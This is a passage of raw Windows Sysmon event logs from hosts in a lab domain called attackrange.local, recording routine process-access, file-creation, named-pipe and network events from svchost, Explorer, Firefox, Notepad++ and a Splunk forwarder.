07:54:06.611{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.611{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.611{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.611{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.611{466BC892-32D3-60E8-770B-00000000CF01}63564228C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.611{466BC892-32D3-60E8-770B-00000000CF01}63564228C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.331{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18D522C143CF4A549196A522E6A4198B,SHA256=537569BF5A9242A7CADF891314A70472782FDEB13778AE2521BAF33E2B4109CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.265{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.233{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5CC7-60E8-0D11-00000000CF01}7760C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001049450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:06.233{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5CC7-60E8-0D11-00000000CF01}7760C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001049449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:54:06.231{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7760.376.114217326C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001049448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:54:06.231{466BC892-5CC7-60E8-0D11-00000000CF01}7760\chrome.7760.376.114217326C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000807876Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:07.906{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F3152105869FF5C4EC9A2FB250CCF69,SHA256=11C73D583E4A70E965223CD08265AC1DCB3296C15553CBBAD512B97E56EB5EF2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.971{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.971{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.956{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.956{466BC892-32D3-60E8-770B-00000000CF01}63565268C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.956{466BC892-32D3-60E8-770B-00000000CF01}63565268C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.956{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.956{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.956{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.836{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075353MD5=FEEA56A70CD049F4F3B111C8BAFFD05B,SHA256=353F0A644826BEA87101B649BF1F812D2CC5035AC3BF46D110AC46B90CC018A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:07.733{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=111D1364BFB9073FA368E3ABDD03FFC5,SHA256=E978F5BAC746ACA3E359E43D3B8D764D5FF20D7D5ACC80741B2DD40D77530F8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807877Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:08.906{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06C3BE352FEADA2240A96FFB583B6679,SHA256=E31FFDFD8355B1C2CA967392DEB752AD62C87FE3DB0A07B3C74DB5FBFDEB16A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:08.988{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075353MD5=BEC53E6D4BE59D23EEBC911FA615E46C,SHA256=E223AAC236A5F16CA5D04404C205699C803B34647119E8DB1D59D561D10B6E89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:08.972{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Program Files\ansible\AttackRangeSysmon.xmlMD5=1430C209EFF7FD5583D3D311A56A889C,SHA256=75358E8028A9D2A1CC1782C71200ED0E529269E98BDC3389937C592CA9D2EB8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:08.739{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2459191E0AC69D26C1EEEDAF404E9F5,SHA256=CAA0190B32B6D281F04DB7C316D39BD38E2A4262439630C4F70E513FA66A39E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807878Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:09.922{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A924BF8E0F1A371DF32D644844D36AD8,SHA256=DEAF2CAD858B0F94461B0CB5204F358E61252EE3E4F200175AEA271D267828D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:09.758{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=265039CE2AF1F2B6558CB1C5C12A5B2F,SHA256=BFC3AF5B3FEFC3640E865E049E06B9A3393FF2C9294EEC4BE716E3FEA8316593,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807880Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:10.953{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B849EB361D89E13FDB51897C7DFA64F3,SHA256=F5D16C88AF441523213DF3F376E1C439C7F4128B86304F8852ECADAC8163E6AB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807879Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:09.242{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57289-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001049584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 